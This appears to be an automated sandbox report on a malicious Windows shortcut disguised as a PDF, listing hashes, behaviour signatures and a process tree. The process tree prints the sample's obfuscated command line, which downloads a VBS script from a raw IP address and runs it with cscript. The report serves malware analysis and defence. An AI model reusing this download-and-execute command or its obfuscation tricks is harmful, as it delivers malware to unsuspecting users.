Analysis
  max time kernel:  122s
  max time network: 131s
  platform:         windows7_x64
  resource:         win7-20230831-en
  resource tags:    arch:x64, arch:x86, image:win7-20230831-en, locale:en-us, os:windows7-x64, system
  submitted:        12/10/2023, 04:27
Static task
  static1

Behavioral task
  behavioral1
  Sample:   Fresh Mission and Core Values.pdf.lnk
  Resource: win7-20230831-en
  3 signatures, 150 seconds

Behavioral task
  behavioral2
  Sample:   Fresh Mission and Core Values.pdf.lnk
  Resource: win10v2004-20230915-en
  6 signatures, 150 seconds
General
  Target: Fresh Mission and Core Values.pdf.lnk
  Size:   2KB
  MD5:    cea0885964c5c18fd7410ca82e0da52e
  SHA1:   272151f1e4f39fd79457dc3f1538103f153c5bf8
  SHA256: e69a776549f8c3e68d4729dde9a1679f633d230bca21b6a2144dfd5599269d6e
  SHA512: 3e0c9105e096d880750f43f3fd2e2b15b917a7e5c616367b16b16761b43065584238038d9bf9012c8b8227558d97c321268f299eba2c29227fd8ea5dc7a7c5e0

Score
  3/10
Malware Config
Signatures
  Enumerates physical storage devices (1 TTPs)
    Attempts to interact with connected storage/optical drive(s).

  Runs ping.exe (1 TTPs, 2 IoCs)
    pid   Process
    812   PING.EXE
    3032  PING.EXE

  Suspicious use of WriteProcessMemory (12 IoCs)
    description                        pid   Process  procid_target
    PID 1408 wrote to memory of 2596   1408  cmd.exe  29
    PID 1408 wrote to memory of 2596   1408  cmd.exe  29
    PID 1408 wrote to memory of 2596   1408  cmd.exe  29
    PID 2596 wrote to memory of 812    2596  cmd.exe  30
    PID 2596 wrote to memory of 812    2596  cmd.exe  30
    PID 2596 wrote to memory of 812    2596  cmd.exe  30
    PID 2596 wrote to memory of 3032   2596  cmd.exe  31
    PID 2596 wrote to memory of 3032   2596  cmd.exe  31
    PID 2596 wrote to memory of 3032   2596  cmd.exe  31
    PID 2596 wrote to memory of 2612   2596  cmd.exe  32
    PID 2596 wrote to memory of 2612   2596  cmd.exe  32
    PID 2596 wrote to memory of 2612   2596  cmd.exe  32
Processes
  C:\Windows\system32\cmd.exe
    command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\Fresh Mission and Core Values.pdf.lnk"
    signatures:   Suspicious use of WriteProcessMemory
    PID: 1408

    C:\Windows\System32\cmd.exe
      command line: "C:\Windows\System32\cmd.exe" /c kdYh || EchO kdYh & p"in"G kdYh || cU"Rl" http://185.39.18.170/3q/4F9 -o C:\Users\Admin\AppData\Local\Temp\kdYh.vbs & p"in"G -n 3 kdYh || C"sC"R"iPT" C:\Users\Admin\AppData\Local\Temp\kdYh.vbs & eXit
      signatures:   Suspicious use of WriteProcessMemory
      PID: 2596

      C:\Windows\system32\PING.EXE
        command line: p"in"G kdYh
        signatures:   Runs ping.exe
        PID: 812

      C:\Windows\system32\PING.EXE
        command line: p"in"G -n 3 kdYh
        signatures:   Runs ping.exe
        PID: 3032

      C:\Windows\system32\cscript.exe
        command line: C"sC"R"iPT" C:\Users\Admin\AppData\Local\Temp\kdYh.vbs
        PID: 2612